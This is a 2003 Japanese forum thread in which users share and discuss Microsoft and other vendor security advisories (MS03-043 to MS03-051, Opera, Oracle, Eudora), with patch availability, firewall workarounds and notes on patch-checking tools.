821名無しさん@お腹いっぱい。:03/10/18 17:59 ID:???
UNIXだとパッチも何もいらないと思っている厨ハケーン

少なくとも NT 3.5 、4.0 、2kはNSAのC2を取得している。高度なセキュリティが実装
されていてもデフォルトで無効になってることこそが問題。
822名無しさん@お腹いっぱい。:03/10/18 18:18 ID:???
>>827
> UNIXだとパッチも何もいらないと思っている厨ハケーン

よく読め。ここまでひどくはない、とは書いてあるがパッチ不要なんて書いてないだろ。


> 少なくとも NT 3.5 、4.0 、2kはNSAのC2を取得している。高度なセキュリティが実装
> されていてもデフォルトで無効になってることこそが問題。

NTのころ、さかんにNSAのC2取得を自慢してたけど、「正し、ネットワークに繋がってい
ない状態であること」という条件付きであることがバレて大恥かいたんだよな。
823名無しさん@お腹いっぱい。:03/10/18 18:32 ID:0ZoC+vsf
> UNIXだとパッチも何もいらないと思っている厨ハケーン  <文盲ハケーン
824名無しさん@お腹いっぱい。:03/10/18 18:55 ID:2gAlcOLg
ドザ=どざえもん
825窓板住人 ◆winDOwS0aE :03/10/18 21:26 ID:???
「OSの構造に起因」ってよく言うけど、どういう構造なんだろうねぇ。>教えて偉い人
だいたい、9xとNTって構造全く違うのに9xの時代から変わらず言ってるよねぇ。

C2に関しては眉唾物程度と言うことで。だいたいC2って低い方のランクじゃなかったっけ・・・

Windows UpdateとかWIndows Installerはまだ良くできてる方なんだと思う。
じゃなかったら何でapt-getとかup2dateとかがLinuxではやり出すのか。
なぜtar ball展開してmake installからrpmやパッケージ方式に進化しているのか。


ま、どっちもどっちってことで。
826窓板住人 ◆winDOwS0aE :03/10/19 19:13 ID:???
Windows XP SP2の遅れは新セキュリティ技術「Springboard」のせい
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20031016/4/

米Microsoftがどうして「Windows XP Service Pack 2(SP2)のリリースに時間かかる」
としているのか,その理由が明らかになってきた。同社は次期バージョンのWindows
であるLonghorn(開発コード名)で採用する予定だったセキュリティ技術の一部を,
Windows XP SP2に盛り込もうとしている。これにより,Windows XP SP2の開発が遅れて
いるのだ。Windows XP SP2のセキュリティ水準は,デフォルトのWindows XPとLonghorn
の中間点に位置するようになるだろう。
827窓板住人 ◆winDOwS0aE :03/10/20 23:35 ID:???
■ MS03-043: メッセンジャ サービスのバッファ オーバーランにより、コードが実行される (828035)
(Microsoft, 2003.10.16)
http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2003/10.html#20031020_ms03-043
修正プログラムがあるので適用すればよい。現在 Windows NT 4.0 Workstation および
Windows 2000 SP2 用の修正プログラムは Windows Update では適用できないようだ。
MS03-043 から個別に取得し、適用する必要がある。

回避するには、メッセンジャサービスを無効にすればよい。ほとんどの人は無効にして
構わないだろう。 Windows Server 2003 では、デフォルトで無効になっている。無効にする
方法は MS03-043 で説明されている。
828窓板住人 ◆winDOwS0aE :03/10/21 22:34 ID:???
なんかセキュリティホールmemo Watchになっちゃってますけど(^^;;

■ Cross Site Java applets (bugtraq, Tue, 21 Oct 2003 06:24:35 +0900)
http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2003/10.html#20031021_Java
 Sun の JRE 1.4.2_01 に欠陥。別々のドメインから読み込まれた、署名されていない
アプレットが、JDK の文書化されていない変数を介してデータを共有できてしまう、という指摘。
1.4.2 系列の最新は 1.4.2_02 なのだが、こちらではどうなのか不明。

■ Opera HREF escaped server name overflow (bugtraq, Mon, 20 Oct 2003 23:39:48 +0900)
http://www.st.ryukoku.ac.jp/~kjm/security/ml-archive/bugtraq/2003.10/msg00203.html
 Opera 7.11 / 7.20 の、少なくとも Windows 版と Linux 版に欠陥。
A タグの HREF 属性の処理において buffer overflow が発生する。このため、悪意ある
web ページ作成者や HTML メール送信者によって任意のコードを実行させることが可能となる。
 Opera 7.21 で修正されている。しかし、Opera 7.21 press releases (opera.com) には security
なんて文字はどこにもない。また Changelog for Opera 7.21 for Windows (opera.com) には
Privacy and security
・ Updated to latest version of OpenSSL
としか書かれていない。この会社のセキュリティへの取りくみははあいかわらず低いレベルに
保たれているようだ。
 日本語版の Opera 7.21 はまだないようですね。
829名無しさん@お腹いっぱい。:03/10/23 18:53 ID:???
>>828
いつもありがとうございます。
今、Operaをインストールしようとしているところでした。
830名無しさん@お腹いっぱい。:03/10/23 18:54 ID:???
>>829
Win用日本語版Opera7.21はリリースされたわけだが。
831窓板住人 ◆winDOwS0aE :03/10/23 21:47 ID:???
>>830
www.opera.comでは入手できるみたいですね。
www.jp.opera.comは7.20なんですけどね。
832名無しさん@お腹いっぱい。:03/10/23 21:59 ID:???
>>828
>Sun の JRE 1.4.2_01
java -versionしたらビンゴだった…。

#セキュリティmemoにRSSがあったらまとめて見られて便利なのになぁ
833窓板住人 ◆winDOwS0aE :03/10/26 16:34 ID:???
「第二のMSBlast」がやって来る?
http://www.zdnet.co.jp/enterprise/0310/24/epn07.html

Microsoftが先週、初の月例セキュリティアップデートの際に公表した五つの
「緊急」の脆弱性のうちの一つを使って、Windowsマシンをクラッシュする方法
を示した実証コードが公開され、専門家の間で懸念を呼んでいる。

Microsoftが最近発表した脆弱性を実証するプログラムがリリースされたことから、
パッチの適用を済ませていない企業はトラブルに巻き込まれる恐れがある――。
セキュリティの専門家らがそう指摘している。

今週セキュリティメーリングリスト上で公開されたこのプログラムは、Windowsの
「メッセンジャーサービス」機能が抱える欠陥を利用してWindowsベースの
コンピュータをクラッシュさせる。この脆弱性は現行のほとんどすべてのWindows
システムに見られるものであることから、セキュリティ専門家らは、攻撃者がこの
欠陥を突いて多数のコンピュータの制御権を奪う手段を考案するのも時間の問題
だろうと懸念を示している。

窓板住人注:Messenger Service は、MSN Messenger/Windows Messengerとは異なるものです。
834名無しさん@お腹いっぱい。:03/10/31 22:58 ID:L3vuXn4p
「MS03-042」や「MS03-043」のパッチに不具合があり修正される
〜特定の環境化で適用中にハングアップする不具合を修正
http://internet.watch.impress.co.jp/cda/news/2003/10/31/977.html
835名無しさん@お腹いっぱい。:03/11/07 01:02 ID:???
1週間、何もないままだと逆に不安
836名無しさん@お腹いっぱい。:03/11/07 22:37 ID:???
>>835
> 1週間、何もないまま
Windows Updateは週刊から月刊になったんで、
予定通りならさ来週あたり。
さて、何本立てになるでしょうか(w
837835:03/11/08 00:54 ID:???
月一になったんですか、なるほど。
836さんありがと
838名無しさん@お腹いっぱい。:03/11/08 02:02 ID:???
>>836-837
次の水曜日(12日)じゃね?

プロダクト セキュリティ 警告サービスのメールより
> 今月より、セキュリティ情報を毎月第 2 水曜日に公開するようにいたしました。
> (初回である今月は、第 3 水曜日の公開となりました)
839窓板住人 ◆winDOwS0aE :03/11/08 09:53 ID:???
まぁ、新着だけじゃなく重大なアップデートなどもあれば随時書き込みすると言うことで。
840窓板住人 ◆winDOwS0aE :03/11/08 12:45 ID:???
マイクロソフト サポート技術情報 - 828041
[OFF2003] 特定のOfficeArtを含むドキュメントで発生する問題の Office 2003 修正プログラムの概要
http://support.microsoft.com/?kbid=828041

この資料は以下の製品について記述したものです。
Microsoft Office 2003, All Editions

概要
マイクロソフトは、Microsoft Office 2003 の修正プログラムをリリースしました。この修正プログラムに
より、OfficeArt の図形を含む Microsoft Office PowerPoint 2003、Microsoft Office Word 2003、
または、Microsoft Office Excel 2003 のドキュメントを以前のバージョンの Microsoft Office で
開いて保存した場合に発生する問題が修正されます。
この資料では、Office 2003 修正プログラム (KB828041) のダウンロードとインストールの方法に
ついて説明します。

現象
フリーフォームなどで作成した特定の OfficeArt の図形を含む Microsoft Office PowerPoint 2003、
Microsoft Office Word 2003、または、Microsoft Office Excel 2003 のドキュメントをOffice XP で開き、
[図形描画] ツール バーを使用して、フリーフォームの図形の線または塗りつぶしを変更し、一旦保存
します。すると、空の複合プロパティがドキュメントに保存されることがあります。その後、その
ドキュメントを Microsoft Office 97 または Microsoft Office 2000 で開き、再度保存すると、内部
テーブルに変更が発生します。そのドキュメントを 再度Office 2003 で開くと、次のいずれかの現象が
発生することがあります。
 ・ドキュメントを開くことができず、エラー メッセージが表示されます。
 ・ドキュメントは開かれますが、OfficeArt の図形が欠落し、エラー メッセージが表示されます。
 ・ドキュメントは開かれますが、OfficeArt の図形が欠落し、その際エラー メッセージは表示されません。

本現象は、上記現象の手順での利用に限り発生します。フリーフォームの図形などを Office XP で
編集していない場合や、Office XP で編集した場合でも Microsoft Office 97 または Microsoft Office
2000 で再度保存していない場合の、通常のドキュメントの交換の場合は本現象は発生しません。
841名無しさん@お腹いっぱい。:03/11/11 09:41 ID:???
保守
842窓板住人 ◆winDOwS0aE :03/11/12 23:13 ID:???
今月の月刊Windows Updateは3件です。
さらにOffice Updateが必要なセキュリティホールも報告されました。ご注意下さい。

でははじめます(かなり出遅れたけど

Internet Explorer 用の累積的なセキュリティ更新 (824145) (MS03-048) 印刷
登録日 : 2003/11/12 更新日 : 2003/11/12
http://www.microsoft.com/japan/technet/security/bulletin/MS03-048.asp

このセキュリティ情報の対象となるユーザー : MicrosoftR Internet ExplorerR をインストールしているお客様
脆弱性の影響 : リモートでコードが実行される
最大深刻度 : 緊急
推奨する対応策 : お客様はこのセキュリティ更新を直ちにインストールして下さい
含まれる過去の修正プログラム : この更新は、マイクロソフト セキュリティ情報 MS03-040 で提供された累積的な更新を含みます。
警告 : なし
テストしたソフトウェアおよび修正プログラムのダウンロード先

影響を受けるソフトウェア :
Microsoft Windows 98 Second Edition
Microsoft Windows Millennium Edition
Microsoft Windows NT Workstation 4.0, Service Pack 6a
Microsoft Windows NT Server 4.0, Service Pack 6a
Microsoft Windows NT Server 4.0, Terminal Server Edition, Service Pack 6
Microsoft Windows 2000, Service Pack 2, Service Pack 3, Service Pack 4
Microsoft Windows XP, Service Pack 1
Microsoft Windows XP 64 bit Edition
Microsoft Windows XP 64 bit Edition Version 2003
Microsoft Windows Server 2003
Microsoft Windows Server 2003 64 bit Edition
843窓板住人 ◆winDOwS0aE :03/11/12 23:13 ID:???
テストした Microsoft Windows コンポーネント :
影響を受けるコンポーネント : PC/AT
Internet Explorer 6 Service Pack 1
Internet Explorer 6 Service Pack 1 (64-Bit Edition)
Internet Explorer 6 Service Pack 1 for Windows Server 2003
Internet Explorer 6 Service Pack 1 for Windows Server 2003 (64-Bit Edition)
Internet Explorer 6 Gold
Internet Explorer 5.5 Service Pack 2
Internet Explorer 5.01 Service Pack 4
Internet Explorer 5.01 Service Pack 3
Internet Explorer 5.01 Service Pack 2

技術的な詳細
技術的な説明 :
これは Internet Explorer 5.01、5.5 および 6 用に以前リリースされたすべての更新の機能を含む
累積的な更新です。さらに、新たに確認された次の 5 つの脆弱性を排除します。
・Internet Explorer のクロスドメイン セキュリティ モデル (異なるドメインのウィンドウが情報を
共有しないようにする) に関連する 3 つの脆弱性。これらの脆弱性により、マイ コンピュータ
ゾーンでスクリプトが実行される可能性があります。(略)
・Internet Explorer の XML オブジェクトにゾーン情報が渡される方法に関連する脆弱性。
この脆弱性により、攻撃者はユーザーのコンピュータ上のローカルファイルを読み取ることができる
可能性があります。(略)
・Internet Explorer の ダイナミック HTML (DHTML) イベント中のドラッグアンド ドロップ操作に
関連する脆弱性。この脆弱性により、ユーザーがリンクをクリックすると、ユーザーのコンピュータの
標的となる場所にファイルが保存される可能性があります。ユーザーにダウンロードを承認するよう
要求するダイアログは表示されません。(略)
844窓板住人 ◆winDOwS0aE :03/11/12 23:13 ID:???
マイクロソフト セキュリティ情報 MS03-004、MS03-015、MS03-020、MS03-032、および MS03-040 で
以前リリースされた Internet Explorer 用の累積的な更新のように、この累積的な更新は、HTML ヘルプ
の更新が適用されていない場合、window.showHelp( ) が機能を停止するようにします。サポート技術情報
811630 の更新された HTML ヘルプ コントロールがインストールされている場合、この更新を適用した後でも、
HTML ヘルプ機能を使用することができます。

再起動の必要性 :
Internet Explorer 6: コンピュータを再起動する必要があります。
Internet Explorer 5.01 および Internet Explorer 5.5 : Windows NT 4.0/2000 ベースのコンピュータ
では、コンピュータを再起動し、管理者としてログオンする必要があります。

以前の更新の状況 :
この更新は 2003 年 10 月にリリースされた MS03-040 の「Internet Explorer 用の累積的な修正プログラム
(828750)」を含みます。
845窓板住人 ◆winDOwS0aE :03/11/12 23:15 ID:???
なお、セキュリティホールmemoによるとPC-9800シリーズ用のInternet Explorerの
累積的な修正プログラムはWindows Updateから入手可能らしいです。
846窓板住人 ◆winDOwS0aE :03/11/12 23:23 ID:???
Workstation サービスのバッファ オーバーランにより、コードが実行される (828749) (MS03-049)
登録日 : 2003/11/12 更新日 : 2003/11/12
http://www.microsoft.com/japan/technet/security/bulletin/MS03-049.asp

概要 :
このセキュリティ情報の対象となるユーザー : MicrosoftR WindowsR を使用しているお客様
脆弱性の影響 : リモートでコードが実行される
最大深刻度 : 緊急
推奨する対応策 : システム管理者は直ちにこの更新をインストールして下さい。
含まれる過去の修正プログラム : なし
警告 : なし
テストしたソフトウェアおよび修正プログラムのダウンロード先
影響を受けるソフトウェア :
PC/AT PC-9800
Microsoft Windows 2000 Service Pack 2、Service Pack 3、または Service Pack 4
Microsoft Windows XP Service Pack 未適用、または Service Pack 1 注 -
Microsoft Windows XP 64-bit Edition 注 -

注 : 10 月 16 日にリリースされた MS03-043 (828035) の Windows XP 用のセキュリティ更新に、
この脆弱性に対する保護の手助けとなる更新されたファイルが含まれています。また、すでに
MS03-043 (828035) の修正プログラムを適用された Windows XP 環境では、Windows Update に、
このセキュリティ修正が表示されることはありません。しかし、このセキュリティ情報 (MS03-049) の
Windows 2000 用のセキュリティ修正プログラムには、MS03-043 (828035) に含まれていない更新された
ファイルが含まれています。MS03-043 (828035) の Windows 2000 用のセキュリティ更新を適用した
お客様も、この Windows 2000 のセキュリティ更新をインストールする必要があります。
847窓板住人 ◆winDOwS0aE :03/11/12 23:23 ID:???
影響を受けないソフトウェア :
Microsoft Windows NT Workstation 4.0, Service Pack 6a
Microsoft Windows NT Server 4.0, Service Pack 6a
Microsoft Windows NT Server 4.0, Terminal Server Edition, Service Pack 6
Microsoft Windows Millennium Edition
Microsoft Windows XP 64-Bit Edition Version 2003
Microsoft Windows Server 2003
Microsoft Windows Server 2003 64-Bit Edition

セキュリティ情報 for Mobile :
携帯電話、PDA などのモバイルツールからもセキュリティ情報をご覧いただけます。
http://www.microsoft.com/japan/support/mobile/bulletin.aspx?secid=MS03-049

技術的な詳細
技術的な説明 :
Workstation サービスにセキュリティ上の脆弱性が存在し、これにより影響を受けるコンピュータで、
リモートでコードが実行される可能性があります。この脆弱性は Workstation サービスに未チェックの
バッファが含まれるため、起こります。(略)

問題を緩和する要素 :
受信 UDP ポート 138、139、445 および TCP ポート 138、139、445 を、ファイアウォールを使用して
ブロックしている場合、攻撃者が Workstation サービスにメッセージを送ることが阻止されます。
Windows XP のインターネット接続ファイアウォールなどのほとんどのファイアウォールはこれらのポートを
既定でブロックします。
Workstation サービスを無効にすることにより、攻撃の可能性が防がれますが、この回避策を実行すると、
多くの影響があります。詳細は「回避策」のセクションをご覧下さい。
Windows 2000 および Window XP のみがこの脆弱性の影響を受けます。そのほかのオペレーティング
システムはこの攻撃の影響は受けません。
848窓板住人 ◆winDOwS0aE :03/11/12 23:25 ID:???
深刻度 :
Microsoft Windows 2000 緊急
Microsoft Windows XP 緊急

回避策
マイクロソフトはこの脆弱性に対応するための次の回避策のテストを行ないました。
これらの回避策は根本的な脆弱性を修正しませんが、既知の攻撃の方法を阻止する手助けとなります。
回避策は機能の低下の原因となる場合もありますが、その場合には下に記します。

・ファイアウォールで UDP ポート 138、139、445 および TCP ポート 138、139、445 をブロックする
これらのポートはリモート コンピュータでリモート プロシージャコール (RPC) 接続を
受け入れるために使用されます。これらをファイアウォールでブロックすることにより、
ファイアウォールで保護されているコンピュータがこの脆弱性を悪用する攻撃を受けることを
防ぐ手助けとなります。
・Windows XP に含まれるインターネット接続ファイアウォールなどのパーソナル ファイアウォールを使用する
Windows XP のインターネット接続ファイアウォール機能を使用し、インターネット接続を
保護している場合、既定でインターネットからの受信トラフィックがブロックされます。

・Windows 2000 ベースのコンピュータおよび Windows XP ベースのコンピュータのアドバンスト TCP/IP フィルタリングを有効にする
アドバンスト TCP/IP フィルタリングを有効にすると、受信者が送信を要求していないすべての受信トラフィックをブロックすることができます。次のサポート技術情報で、この構成方法について説明しています。
http://support.microsoft.com/default.aspx?scid=kb;ja;309798
マイクロソフト サポート技術情報 - 309798 Windows 2000 で TCP/IP フィルタリングを構成する
849窓板住人 ◆winDOwS0aE :03/11/12 23:25 ID:???
・Workstation サービスを無効にする
Workstation サービスを無効にすることにより、攻撃の可能性が防がれます。(手順略)

回避策の影響 : Workstation サービスが無効にされている場合、コンピュータはネットワークの
共有ファイル リソースや共有印刷リソースに接続することができません。この回避策は、
スタンド アロンでネットワークに接続する必要のない多くのホーム ユーザーなどのコンピュータで
のみ使用して下さい。Workstation サービスが無効にされている場合、Workstation サービスに
明示的に依存しているすべてのサービスは起動せず、エラーメッセージがシステム イベント ログに
記録されます。次のサービスは Workstation サービスに依存しています。
Alerter (警告) Browser (ブラウザ) Messenger (メッセンジャ) Net Logon (ネットワーク ログオン) RPC Locator (RPC ロケータ)
これらのサービスはネットワークのリソースにアクセスする、またドメイン認証を実行するために
必要です。ダイヤルアップ接続、DSL 接続またはケーブル モデム接続など、スタンド アロン
コンピュータについてのインターネット接続およびブラウジングは、これらのサービスが無効に
されていても、影響は受けません。

注 : Microsoft Baseline Security Analyzer は Workstation サービスが無効にされている場合、
機能しません。そのほかのアプリケーションもまた、Workstation を必要とする場合があります。
アプリケーションが Workstation サービスを必要とする場合、単にこのサービスを再度有効にして
下さい。これは、Workstation サービスの [スタートアップの種類] を [自動] に戻し、コンピュータを
再起動することにより、行なうことができます。

再起動の必要性 :
この更新は再起動を必要としない場合もあります。インストーラが必要なサービスを停止し、
修正プログラムを適用し、次にそれらのサービスを再起動します。しかし、必要なサービスが
何らかの理由で停止されない場合、または必要なファイルが使用中である場合、再起動が必要と
なります。この場合、再起動が必要であることを通知する確認メッセージが表示されます。
850窓板住人 ◆winDOwS0aE :03/11/12 23:39 ID:???
重要:このセキュリティホールはWindows Updateでは自動更新されません。
ただしOffice Updateからインストールすることができます。
http://office.microsoft.com/ProductUpdates/default.aspx

Microsoft Word および Microsoft Excel の脆弱性により、任意のコードが実行される (831527) (MS03-050)
登録日 : 2003/11/12 更新日 : 2003/11/12
http://www.microsoft.com/japan/technet/security/bulletin/MS03-050.asp

概要 :
このセキュリティ情報の対象となるユーザー : MicrosoftR Excel または Microsoft Word を使用しているお客様
脆弱性の影響 : 攻撃者の任意のコードが実行される
最大深刻度 : 重要
推奨する対応策 : Microsoft Excel または Microsoft Word の影響を受けるバージョンを使用しているお客様は可能な限り早期に、適切なセキュリティ修正プログラムをインストールして下さい。
含まれる過去の修正プログラム Excel : この修正プログラムは次のセキュリティ情報で提供された修正プログラムを含みます。MS01-050、MS02-031、および MS02-059
含まれる過去の修正プログラム Word : この修正プログラムは次のセキュリティ情報で提供された修正プログラムを含みます。MS02-021、MS02-031、MS02-059、および MS03-035
警告 : なし
影響を受けるソフトウェア :
Microsoft Excel 97/2000/2002
Microsoft Word 97/98 (日本語版)/2000/2002
Microsoft Works Suite 2001/2002/2003/2004 (英語版)
851窓板住人 ◆winDOwS0aE :03/11/12 23:39 ID:???
Office アップデート からインストールすることもできます。
Office アップデートの利用方法については以下のサイトを参照してください。
http://www.microsoft.com/japan/security/square/guard/a04g41.asp

影響を受けないソフトウェア :
Microsoft Office Word 2003
Microsoft Office Excel 2003

セキュリティ情報 for Mobile :
携帯電話、PDA などのモバイルツールからもセキュリティ情報をご覧いただけます。
http://www.microsoft.com/japan/support/mobile/bulletin.aspx?secid=MS03-050

技術的な詳細
技術的な説明 :
悪質なコードが実行される可能性のある脆弱性が Microsoft Excel に存在します。
この脆弱性は、Excel がマクロの指示を読み取る前に、スプレッドシートをチェックするために
使用する方法が原因となって、この脆弱性が起こります。(略)
悪質なコードが実行される可能性のある脆弱性が Microsoft Word に存在します。
Word が文書に埋め込まれているデータの値 (マクロの名前) の長さをチェックする方法が
原因となって、この脆弱性が存在します。不正な文書が作成され、それが開かれると、Word 内の
データの値がオーバーフローし、任意のコードが実行される可能性があります。(略)
852窓板住人 ◆winDOwS0aE :03/11/12 23:40 ID:???
深刻度 :ぜんぶ重要
回避策
この脆弱性は組み込みのマクロ セキュリティを無視するというものであるため、
この修正プログラムを適用できない場合の最善の回避策は、信頼されないソースからの文書を
開かないということです。

セキュリティ修正プログラムに関する情報
Microsoft Works Suite 2001 (英語版) については、Word 2000 のセクションをご覧下さい。
Microsoft Works Suite 2002、2003、および 2004 (いずれも英語版です) については、Word 2002 のセクションをご覧下さい。

・Microsoft Excel 97
 クライアント更新の必要条件
 このセキュリティ修正プログラムは Office 97 Service Release 2 を必要とします。
・Microsoft Excel 2000
 クライアント更新の必要条件
 重要 : この修正プログラムをインストールする前に、次の必要条件が満たされていることを確認して下さい。
 Microsoft Windows Installer 2.0
 Office 2000 Service Pack 3 (SP-3)
・Microsoft Excel 2002
 クライアント更新の必要条件
 重要 : この修正プログラムをインストールする前に、次の必要条件が満たされていることを確認して下さい。
 Microsoft Windows Installer 2.0
 Office XP Service Pack 2 (SP-2)
・Microsoft Word 97
 クライアント更新の必要条件
 このセキュリティ修正プログラムをインストールするには Office 97 Service Release 2 を必要とします。
853窓板住人 ◆winDOwS0aE :03/11/12 23:40 ID:???
・Microsoft Word 98 (日本語版)
 クライアント更新の必要条件
 このセキュリティ修正プログラムをインストールするには Office 97 Service Release 2 を必要とします。
・Microsoft Word 2000
 クライアント更新の必要条件
 重要 :この修正プログラムをインストールする前に、以下の要件が満たされていることを確認してください。 Microsoft Windows Installer 2.0
 Office 2000 Service Pack 3 (SP-3)
・Microsoft Word 2002
 クライアント アップデートの必要条件
 重要 : この修正プログラムをインストールする前に、次の必要条件が満たされていることを確認して下さい。
 Microsoft Windows Installer 2.0
 Office XP Service Pack 2 (SP-2)
詳細情報 :
よく寄せられる質問 : マイクロソフトセキュリティ情報(MS03-050)
http://www.microsoft.com/japan/technet/security/bulletin/fq03-050.asp
US マイクロソフトセキュリティ情報(MS03-050)
http://www.microsoft.com/technet/security/bulletin/ms03-050.asp
この脆弱性に対するサポート技術情報 (KB) は現在準備中です。
854窓板住人 ◆winDOwS0aE :03/11/12 23:44 ID:???
Microsoft FrontPage Server Extensions のバッファ オーバーランにより、コードが実行される (813360) (MS03-051)
登録日 : 2003/11/12 更新日 : 2003/11/12
http://www.microsoft.com/japan/technet/security/bulletin/MS03-051.asp

概要 :
このセキュリティ情報の対象となるユーザー :
MicrosoftR FrontPage Server ExtensionsR を使用しているお客様
脆弱性の影響 : リモートでコードが実行される
最大深刻度 : 緊急
推奨する対応策 : お客様は、適切なセキュリティ修正プログラムを直ちにインストールしてください。
含まれる過去のセキュリティ修正プログラム : この修正プログラムは、マイクロソフト セキュリティ情報 MS01-035 および MS02-053で提供された修正も含まれています。
警告 : なし
テストしたソフトウェア

影響を受けるソフトウェア :
Microsoft Windows 2000 ServicePack 2、または ServicePack 3
Microsoft Windows XP 初期出荷版、または ServicePack 1
Microsoft Office XP 初期出荷版、Service Pack 1、または Service Pack 2
855窓板住人 ◆winDOwS0aE :03/11/12 23:45 ID:???
影響を受けないソフトウェア :
Windows NT 4.0 (FrontPage Server Extensions をインストールしていない場合)
Microsoft Windows 2000 ServicePack 4
Windows Server 2003 (Windows SharePoint Services)
Windows XP 64bit Edition version 2003 (英語版)
Microsoft Office System 2003
テストした Microsoft Windows および Office コンポーネント :

影響を受けるコンポーネント :
Microsoft FrontPage 2000 Server Extensions (Windows Update対応)
Microsoft FrontPage 2000 Server Extensions (Windows 2000 に同梱・Windows Update対応)
Microsoft FrontPage 2000 Server Extensions (Windows XP に同梱・Windows Update対応)
Microsoft FrontPage Server Extensions 2002
Microsoft SharePoint Team Services 2002 (Office XP に同梱・Office Update対応)

セキュリティ情報 for Mobile :
携帯電話、PDA などのモバイルツールからもセキュリティ情報をご覧いただけます。
http://www.microsoft.com/japan/support/mobile/bulletin.aspx?secid=MS03-051
856窓板住人 ◆winDOwS0aE :03/11/12 23:45 ID:???
技術的な詳細 技術的な説明 :
Microsoft FrontPage Server Extensions に 2 つのセキュリティ上の脆弱性が存在し、
最も深刻な場合、攻撃者がユーザーのコンピュータ上で任意のコードを実行する可能性があります。(略)

問題を緩和する要素 :
Windows 2000 システムに Service Pack 4 を適用した管理者は、これらの脆弱性による影響はありません。
Windows XP には既定で FrontPage Server Extensions がインストールされません。
Windows NT 4.0 には Windows NT4.0 Option Pack を適用していない限り、既定で FrontPage Server Extensions がインストールされません。

深刻度 : 全て緊急
857窓板住人 ◆winDOwS0aE :03/11/12 23:47 ID:???
Oracle9i Application Server におけるSQLインジェクション脆弱性 (oracle, 2003.11.12)
http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2003/11.html#20031112_oracle

Oracle による深刻度表記: 1 (「非常にリスクが高くあまり専門的な知識がなくても攻撃が
可能であるもの。影響が及ぶ製品に対して緊急(最も高い優先度)にパッチの適用または
回避策の実施が必要です」)。

Oracle9iAS Portal 9.0.2.3.0 以前、3.0.9.8.5 以前に欠陥。 Oracle9iAS Portal へのリクエスト
URL に対して SQL injection 攻撃が可能。この結果、remote から認証なしで Oracle9i 上の
データにアクセスすることが可能となる。
回避策はない。patch があるので適用すればよい。また OracleAS Portal 9.0.4 には
この欠陥はない。
858窓板住人 ◆winDOwS0aE :03/11/12 23:48 ID:???
SNS Advisory No.69 Eudora "Reply-To-All" Buffer Overflow Vulnerabilty
http://www.lac.co.jp/security/intelligence/SNSAdvisory/69.html

概要: 特定のバージョンの Eudora for Windows には、 Buffer Overflow を
生じさせてしまう問題が存在します。 悪意ある攻撃者はこの問題を利用することで、
標的ユーザの権限で任意のコードを実行できる可能性があります。

問題: Eudora を利用し、ヘッダの From: フィールドに長大な文字列を含むメールを
受けとった場合、このメールに対して『全員に返信』を選択した場合に Buffer Overflow
が発生します。この現象は Reply-To: フィールドに長大な文字列を含むメールに
対して『全員に返信』を選択した場合にも発生します。 この問題を利用することで、
悪意ある攻撃者は Eudora を実行するユーザの権限で任意のコードを実行できる
可能性があります。

問題を確認したバージョン:
Eudora 5.1-J for Windows 日本語版
Eudora Version 5.2.0.9 for Windows 英語版

対策:
下記のバージョンへアップグレードを行うことでこの問題を解消することができます。
Eudora 5.1-Jr3 for Windows 日本語版 以降
Eudora Version 6.0 for Windows 英語版 以降
859名無しさん@お腹いっぱい。:03/11/12 23:59 ID:???
>>842-856 まとめ

月間セキュリティ情報
ttp://www.microsoft.com/japan/security/secinfo.asp

MS03-048: Internet Explorer 用の累積的なセキュリティ更新 (824145)
ttp://www.microsoft.com/japan/technet/security/bulletin/MS03-048.asp

MS03-049: Workstation サービスのバッファ オーバーランにより、コードが実行される (828749)
ttp://www.microsoft.com/japan/technet/security/bulletin/MS03-049.asp

MS03-050: Microsoft Word および Microsoft Excel の脆弱性により、任意のコードが実行される (831527)
ttp://www.microsoft.com/japan/technet/security/bulletin/MS03-050.asp

MS03-051: Microsoft FrontPage Server Extensions のバッファ オーバーランにより、コードが実行される (813360)
ttp://www.microsoft.com/japan/technet/security/bulletin/MS03-051.asp

OS: 048, 049, 051 (全て緊急)
Office: 050 (重要)
860名無しさん@お腹いっぱい。:03/11/14 02:22 ID:???
証明書確認の問題により、ID が偽装される (329115) (MS02-050)更新
(MS03-050ではない)

2003 年 11 月 11 日 (米国日付)、マイクロソフトはこのセキュリティ情報を更新し、
Microsoft Windows 2000 Service Pack 4 (SP4) のセキュリティ修正プログラムの
アップデート版が利用可能になったことをお知らせしました。このアップデート版の
修正プログラムは、Windows 2000 SP4 環境での Microsoft Internet Explorer 6
Service Pack 1 のインストール時に発生する可能性があるリグレッションを
修正します。このリグレッションにより、このセキュリティ情報で説明され、
Windows 2000 SP4 の一部として提供されているアップデートが削除されます。
Windows 2000 SP4 を使用し、かつ Internet Explorer 6 Service Pack 1 を
インストールしたお客様は、このアップデート版の Windows 2000 SP4 用の
修正プログラムを適用し、この脆弱性からコンピュータを保護するようにしてください。

http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/MS02-050.asp

Windows 2000 Service Pack 4専用(これ以外は過去ログ参照)
(PC/AT) http://download.microsoft.com/download/2/a/1/2a197fde-3b95-4091-bfb6-c54d0a492b0e/Windows2000-KB329115-x86-JPN.exe
(PC-9800) http://download.microsoft.com/download/f/0/9/f091d1fa-d342-4882-aecb-981c45fe8e07/Windows2000-KB329115-nec98-JPN.exe
861名無しさん@お腹いっぱい。:03/11/16 13:13 ID:???
>>860
この情報(MS02-50) をここで初めて知りました。 

ありがとうございます。
862名無しさん@お腹いっぱい。:03/11/16 13:33 ID:???
IE6バージョン情報の更新バージョン文字列が非常に長い状態だと、
SP1が当たっていても一部パッチチェックツールでGOLD(SP無し)と
判定されるっぽい。
(HFNetChkはエラー234を出すがGOLD扱いでチェックは続行)
-問題あり-
MBSA 1.1.1
HFNetChk 3.82.0.1(MBSA 1.1.1付属)
HFNetChk 3.86.0.1 *
HFNetChkPro/LT 4.0.76.6 *

-問題なし-
HFNetChkPro/LT 4.0.77.2 RC 1 *

-未確認-
HFNetChkPro/LT 4.0.77.1 *
その他古いもの

*はShavlikのサイト(http://www.shavlik.com/)にあるorあったもの。

更新バージョン文字列格納先
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\MinorVersion

既出だったらスマソ。
863名無しさん@お腹いっぱい。:03/11/16 13:46 ID:???
>>861
追記
4.0.77.0の修正内容に似たようなのがあったので4.0.77.1でも問題無さそう。
> Corrected an issue where an Internet Explorer 5.5 SP2 installation
> might be reported as an Internet Explorer 5.5 Gold installation
